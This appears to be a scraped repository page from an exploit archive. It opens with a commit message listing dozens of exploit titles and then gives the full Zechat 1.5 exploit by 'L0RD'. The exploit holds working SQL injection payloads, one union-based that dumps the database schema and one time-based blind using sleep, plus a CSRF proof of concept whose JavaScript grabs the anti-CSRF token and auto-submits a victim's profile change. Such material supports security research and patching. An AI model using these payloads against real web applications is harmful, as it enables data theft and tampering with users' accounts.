7bbc323854
20 changes to exploits/shellcodes Siemens SIMATIC S7-1500 CPU - Remote Denial of Service Microsoft Edge Chakra JIT - Magic Value Type Confusion AMD / ARM / Intel - Speculative Execution Variant 4 Speculative Store Bypass Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read MakeMyTrip 7.2.4 - Information Disclosure Linux 4.4.0 < 4.4.0-53 - AF_PACKET chocobo_root Privilege Escalation (Metasploit) Microsoft Windows - 'POP/MOV SS' Privilege Escalation Multiplayer BlackJack Online Casino Game 2.5 - Persistent Cross-Site Scripting Multiplayer BlackJack Online Casino Game 2.5 - Cross-Site Scripting Zechat 1.5 - SQL Injection / Cross-Site Request Forgery Healwire Online Pharmacy 3.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery Healwire Online Pharmacy 3.0 - Cross-Site Scripting / Cross-Site Request Forgery Private Message PHP Script 2.0 - Persistent Cross-Site Scripting Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery Private Message PHP Script 2.0 - Cross-Site Scripting Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Cross-Site Scripting / Cross-Site Request Forgery ManageEngine Recovery Manager Plus 5.3 - Persistent Cross-Site Scripting ManageEngine Recovery Manager Plus 5.3 - Cross-Site Scripting Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Panel Authentication Bypass Auto Dealership & Vehicle Showroom WebSys 1.0 - Multiple Vulnerabilities Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication Bypass Wchat PHP AJAX Chat Script 1.5 - Persistent Cross-Site Scripting Model Agency Media House & Model Gallery 1.0 - Multiple Vulnerabilities Wchat PHP AJAX Chat Script 1.5 - Cross-Site Scripting Nordex N149/4.0-4.5 - SQL Injection WebSocket Live Chat - Cross-Site Scripting Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting PaulPrinting CMS Printing 1.0 - SQL Injection iSocial 1.2.0 - Cross-Site Scripting / Cross-Site Request Forgery ERPnext 11 - Cross-Site Scripting NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection Auto Car 1.2 - 'car_title' SQL Injection / Cross-Site Scripting NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection Feedy RSS News Ticker 2.0 - 'cat' SQL Injection NewsBee CMS 1.4 - 'download.php' SQL Injection Easy File Uploader 1.7 - SQL Injection / Cross-Site Scripting
87 lines
No EOL
3 KiB
Text
87 lines
No EOL
3 KiB
Text
# Exploit Title: Zechat 1.5 - 'hashtag' / 'v' SQL Injection / Cross site request forgery
|
|
# Date: 2018-05-22
|
|
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
|
|
# Vendor Homepage: https://bylancer.com
|
|
# Version: 1.5
|
|
# Tested on: Kali linux
|
|
====================================================
|
|
# POC 1 : SQLi :
|
|
|
|
Parameter : hashtag
|
|
type : Union based
|
|
|
|
http://test.com/chat/hashtag?hashtag=[SQL]
|
|
|
|
# test :
|
|
http://test.com/chat/hashtag?hashtag=-1%27%20UNION%20SELECT%20NULL,unhex(hex(group_concat(table_name,0x3C62723E,column_name))),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20from%20information_schema.columns%20where%20table_schema=schema()%23
|
|
|
|
# Payload : -1' UNION SELECT
|
|
NULL,unhex(hex(group_concat(table_name,0x3C62723E,column_name))),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
|
|
from information_schema.columns where table_schema=schema()%23
|
|
|
|
====================================================
|
|
|
|
Parameter : v
|
|
type : time-based blind
|
|
|
|
test.com/chat/me?action=edit&v=[SQL]
|
|
|
|
# test : test.com/chat/me?action=edit&v=231 AND sleep(10)%23
|
|
|
|
# Payload : AND sleep(10)%23
|
|
|
|
====================================================
|
|
|
|
# POC 2 : CSRF :
|
|
|
|
# CSRF vulnerability allows attacker to change user's information.
|
|
In this script we have anti-csrf which we can't change user's information
|
|
without token.
|
|
So we use 'hashtag' parameter to set our encoded payload and bypass csrf
|
|
protection : chat/hashtag?hashtag=[We have Reflected XSS here]
|
|
|
|
# Exploit :
|
|
|
|
<form action="http://test.com/chat/data_settings.php" method="POST">
|
|
<input type="hidden" name="csrf_token" value="" />
|
|
<input type="hidden" name="Wall"
|
|
value="Hello would you like to be my friend" />
|
|
<input type="hidden" name="user" value="lord225" />
|
|
<input type="hidden" name="name" value="test" />
|
|
<input type="hidden" name="mail"
|
|
value="d3code.n@gmail.com" />
|
|
<input type="hidden" name="website" value="test" />
|
|
<input type="hidden" name="sex" value="male" />
|
|
<input type="hidden" name="country"
|
|
value="------" />
|
|
<input type="hidden" name="day" value="" />
|
|
<input type="hidden" name="month" value="" />
|
|
<input type="hidden" name="year" value="" />
|
|
<input type="hidden" name="Language" value="en" />
|
|
</form>
|
|
|
|
<script>
|
|
|
|
var token = '';
|
|
var req = new XMLHttpRequest();
|
|
req.onreadystatechange = function(){
|
|
if(this.readyState == 4 && this.status == 200){
|
|
|
|
var setPage = this.responseXML;
|
|
token = setPage.forms[1].elements[0].value; // get token
|
|
console.log(token);
|
|
}
|
|
|
|
}
|
|
req.open("POST","/chat/settings",true);
|
|
|
|
req.setRequestHeader("content-type","application/x-www-form-urlencoded");
|
|
req.responseType = "document";
|
|
req.send();
|
|
|
|
document.forms[0].elements[0].value = token; // set token to our form
|
|
document.forms[0].submit();
|
|
|
|
</script>
|
|
|
|
===================================================== |